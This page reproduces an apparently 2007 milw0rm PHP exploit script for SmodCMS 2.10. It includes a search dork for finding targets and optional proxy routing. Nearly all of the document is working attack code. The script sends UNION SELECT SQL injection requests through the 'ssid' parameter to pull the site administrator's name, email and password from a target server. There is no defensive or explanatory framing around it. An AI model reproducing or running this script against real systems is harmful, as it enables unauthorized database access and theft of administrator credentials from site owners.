Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

SmodCMS 2.10 Slownik ssid Remote SQL Injection Exploit

VIEWS: 54 PAGES: 4

									                         SmodCMS 2.10 Slownik ssid Remote SQL Injection Exploit      Page 1/4
  1    <?
  2    /*
  3    Autor: Kacper
  4    Contact: kacper1964@yahoo.pl
  5    Homepage: http://www.rahim.webd.pl/
  6    Irc: irc.milw0rm.com:6667 #devilteam
  7
  8    Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.
  9
  10   //dork: "SmodCMS" & "S.ownik"
  11
  12   SmodCMS <= 2.10 (Slownik ssid) Remote SQL Injection Exploit
  13   script homepage/download/demo: http://smod.pl/
  14   */
  15   if ($argc<4) {
  16   print_r(’
  17   −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  18   Usage: php ’.$argv[0].’ host path slownik_module_id OPTIONS
  19   host:    target server (ip/hostname)
  20   path:     SmodCMS path
  21   slownik_module_id: id number of slownik module (Standard: 10)
  22   Options:
  23    −p[port]: specify a port other than 80
  24    −P[ip:port]: specify a proxy
  25   Example:
  26   php ’.$argv[0].’ 127.0.0.1 /SmodCMS/ 10
  27   php ’.$argv[0].’ 127.0.0.1 /SmodCMS/ 10 −P1.1.1.1:80
  28   −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  29   ’);
  30   die;
  31   }
  32   error_reporting(7);
  33   ini_set("max_execution_time",0);
  34   ini_set("default_socket_timeout",5);
  35   function quick_dump($string)
  36   {
  37      $result=’’;$exa=’’;$cont=0;
  38      for ($i=0; $i<=strlen($string)−1; $i++)
  39      {
  40        if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  41        {$result.=" .";}
  42       else
  43       {$result.=" ".$string[$i];}
  44        if (strlen(dechex(ord($string[$i])))==2)
  45       {$exa.=" ".dechex(ord($string[$i]));}
  46        else
  47        {$exa.=" 0".dechex(ord($string[$i]));}
  48        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  49      }
  50     return $exa."\r\n".$result;
  51   }
  52   $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
Kacper                                                                               04/06/2007
                          SmodCMS 2.10 Slownik ssid Remote SQL Injection Exploit                 Page 2/4
  53
  54    function wyslijpakiet($packet)
  55    {
  56      global $proxy, $host, $port, $html, $proxy_regex;
  57      if ($proxy==’’) {
  58        $ock=fsockopen(gethostbyname($host),$port);
  59        if (!$ock) {
  60          echo ’No response from ’.$host.’:’.$port; die;
  61        }
  62      }
  63      else {
  64             $c = preg_match($proxy_regex,$proxy);
  65        if (!$c) {
  66          echo ’Not a valid proxy...’;die;
  67        }
  68        $parts=explode(’:’,$proxy);
  69        $parts[1]=(int)$parts[1];
  70        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  71        $ock=fsockopen($parts[0],$parts[1]);
  72        if (!$ock) {
  73          echo ’No response from proxy...’;die;
  74             }
  75      }
  76      fputs($ock,$packet);
  77      if ($proxy==’’) {
  78        $html=’’;
  79        while (!feof($ock)) {
  80          $html.=fgets($ock);
  81        }
  82      }
  83      else {
  84        $html=’’;
  85        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  86          $html.=fread($ock,1);
  87        }
  88      }
  89      fclose($ock);
  90    }
  91
  92    $host=$argv[1];
  93    $path=$argv[2];
  94    $slownik_id=$argv[3];
  95    $port=80;
  96    $proxy="";
  97    for ($i=4; $i<$argc; $i++){
  98    $temp=$argv[$i][0].$argv[$i][1];
  99    if ($temp=="−p")
  100   {
  101      $port=(int)str_replace("−p","",$argv[$i]);
  102   }
  103   if ($temp=="−P")
  104   {
Kacper                                                                                           04/06/2007
                           SmodCMS 2.10 Slownik ssid Remote SQL Injection Exploit                                                 Page 3/4
  105     $proxy=str_replace("−P","",$argv[$i]);
  106   }
  107   }
  108   if (($path[0]<>’/’) or ($path[strlen($path)−1]<>’/’)) {die("Bad path!");}
  109   if ($proxy==’’) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
  110   print "SmodCMS SQL Injection Exploit by Kacper\r\n";
  111   $packet ="POST ".$p."index.php?id=".$slownik_id."&ssid=−1+UNION+SELECT+Imie,1+FROM+Uzytkownicy+WHERE+Grupa=99/* HTTP/1.0\r\n";
  112   $packet.="Accept: image/gif, image/x−xbitmap, image/jpeg, image/pjpeg, application/x−shockwave−flash, */*\r\n";
  113   $packet.="Referer: http://".$host.$path."index.php\r\n";
  114   $packet.="Accept−Language: pl\r\n";
  115   $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  116   $packet.="User−Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
  117   $packet.="Host: ".$host."\r\n";
  118   $packet.="Connection: Close\r\n\r\n";
  119   wyslijpakiet($packet);
  120   sleep(3);
  121   $temp=explode(’<h3>’,$html);
  122   $temp2=explode(’</h3>’,$temp[1]);
  123   $imie_admina=$temp2[0];
  124   echo "Admin Name: ".$imie_admina."\r\n";
  125   $packet ="POST ".$p."index.php?id=".$slownik_id."&ssid=−1+UNION+SELECT+Nazwisko,1+FROM+Uzytkownicy+WHERE+Grupa=99/* HTTP/1.0\r\n";
  126   $packet.="Accept: image/gif, image/x−xbitmap, image/jpeg, image/pjpeg, application/x−shockwave−flash, */*\r\n";
  127   $packet.="Referer: http://".$host.$path."index.php\r\n";
  128   $packet.="Accept−Language: pl\r\n";
  129   $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  130   $packet.="User−Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
  131   $packet.="Host: ".$host."\r\n";
  132   $packet.="Connection: Close\r\n\r\n";
  133   wyslijpakiet($packet);
  134   sleep(3);
  135   $temp=explode(’<h3>’,$html);
  136   $temp2=explode(’</h3>’,$temp[1]);
  137   $nazwisko_admina=$temp2[0];
  138   echo "Admin Surname: ".$nazwisko_admina."\r\n";
  139   $packet ="POST ".$p."index.php?id=".$slownik_id."&ssid=−1+UNION+SELECT+Email,1+FROM+Uzytkownicy+WHERE+Grupa=99/* HTTP/1.0\r\n";
  140   $packet.="Accept: image/gif, image/x−xbitmap, image/jpeg, image/pjpeg, application/x−shockwave−flash, */*\r\n";
  141   $packet.="Referer: http://".$host.$path."index.php\r\n";
  142   $packet.="Accept−Language: pl\r\n";
  143   $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  144   $packet.="User−Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
  145   $packet.="Host: ".$host."\r\n";
  146   $packet.="Connection: Close\r\n\r\n";
  147   wyslijpakiet($packet);
  148   sleep(3);
  149   $temp=explode(’<h3>’,$html);
  150   $temp2=explode(’</h3>’,$temp[1]);
  151   $Email_admina=$temp2[0];
  152   echo "Admin E−Mail: ".$Email_admina."\r\n";
  153   $packet ="POST ".$p."index.php?id=".$slownik_id."&ssid=−1+UNION+SELECT+Haslo,1+FROM+Uzytkownicy+WHERE+Grupa=99/* HTTP/1.0\r\n";
  154   $packet.="Accept: image/gif, image/x−xbitmap, image/jpeg, image/pjpeg, application/x−shockwave−flash, */*\r\n";
  155   $packet.="Referer: http://".$host.$path."index.php\r\n";
  156   $packet.="Accept−Language: pl\r\n";
Kacper                                                                                                                             04/06/2007
                              SmodCMS 2.10 Slownik ssid Remote SQL Injection Exploit     Page 4/4
  157   $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  158   $packet.="User−Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
  159   $packet.="Host: ".$host."\r\n";
  160   $packet.="Connection: Close\r\n\r\n";
  161   wyslijpakiet($packet);
  162   sleep(3);
  163   $temp=explode(’<h3>’,$html);
  164   $temp2=explode(’</h3>’,$temp[1]);
  165   $haslo_admina=$temp2[0];
  166   echo "Admin Password: ".$haslo_admina."\r\n";
  167   ?>
  168
  169   # milw0rm.com [2007−04−06]




Kacper                                                                                   04/06/2007

								
To top